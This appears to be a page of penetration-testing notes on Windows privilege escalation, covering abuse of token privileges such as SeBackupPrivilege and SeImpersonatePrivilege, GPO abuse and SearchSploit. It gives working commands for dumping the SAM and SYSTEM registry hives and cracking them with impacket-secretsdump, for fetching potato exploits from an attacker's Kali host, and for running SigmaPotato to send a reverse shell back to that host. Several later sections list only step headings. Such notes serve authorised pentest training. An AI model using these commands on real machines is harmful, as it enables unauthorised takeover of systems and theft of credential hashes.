Exploits

SeBackupPrivilege

1

Copy SAM and SYSTEM file

reg save hklm\sam C:\Users\<Username>\SAM

reg save hklm\system C:\Users\<Username>\SYSTEM
2

Bring the file to Kali

3

Crack them

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

SeImpersonatePrivilege

SigmaPotato.exe

wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
1

Download SigmaPotato.exe into target machine

iwr -Uri http://<Kali IP Address>/SigmaPotato.exe -OutFile SigmaPotato.exe
2

Execute command

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

EXAMPLE: Send reverse shell back

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

PrintSpoof.exe

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
1

Download PrintSpoofer.exe

iwr -Uri http://<Kali IP Address>/PrintSpoofer[64 / 32].exe -OutFile PrintSpoofer[64 / 32].exe
2

Execute Command

PrintSpoofer.exe -i -c <Command To Execute>

GodPotato.exe

NOTE: Know the version by the following

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
1

Download GodPotato.exe

2

Execute command

SeRestorePrivilege

SeRestoreAbuse.exe

1

Create a reverse shell

2

Download SeRestoreAbuse.exe and Shell File

3

Execute command

SeManageVolumePrivilege

1

Download SeManageVolumeExploit.exe

2

Execute command

3

Create Revershell

4

Trigger the DLL

GPO Abuse

1

Download SharpGPOAbuse.exe

2

Run command

3

Force Group Policy to update

SearchSploit

1

Windows Enumeration

Identify OS name, version, architecture

NOTE: Get Windows Build Version from here.

2

Search exploit in SearchSploit

EXAMPLE:

3

Download exploit

Run as another user

GUI

CLI

1

Download Invoke-RunasCs.ps1

2

Run command

Last updated